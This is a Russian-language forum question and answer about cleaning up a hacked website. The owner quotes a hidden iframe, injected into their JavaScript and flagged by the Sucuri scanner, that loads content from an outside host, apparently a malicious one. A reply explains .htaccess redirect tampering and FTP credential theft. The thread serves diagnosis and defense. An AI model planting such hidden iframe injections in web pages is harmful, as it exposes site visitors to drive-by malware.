Я запустил свой сайт через Sucuri http://sitecheck.sucuri.net/results/www.fort-aspenwood.com
Они придумали эти мошеннические фреймы в моем миниатюрном javascript
<style>.vpqfm { position:absolute; left:-632px; top:-729px; }</style> <div class="vpqfm"><iframe src="http://dhypzebl.serveusers.com/jquery/get.php?ver=jquery.latest.js" width="458" height="424"></iframe></div>
Я искал везде и, похоже, не могу найти, в каком файле javascript находится этот файл, и нет никаких странных кодов php в индексе или где-либо еще.
Есть предположения?
Проверяйте htaccess во всех каталогах вашего сайта. Автоматические сценарии очень часто крадут учетные данные FTP и обновляют .htaccess для перенаправления ресурса (например, JS) на сервер, который обслуживает ваш исходный контент и полезную нагрузку.
Они довольно хорошо скрывают это: он устанавливает cookie и перенаправляет каждого пользователя только один раз и нацелен на определенные типы ОС / браузеров, что делает его незаметным.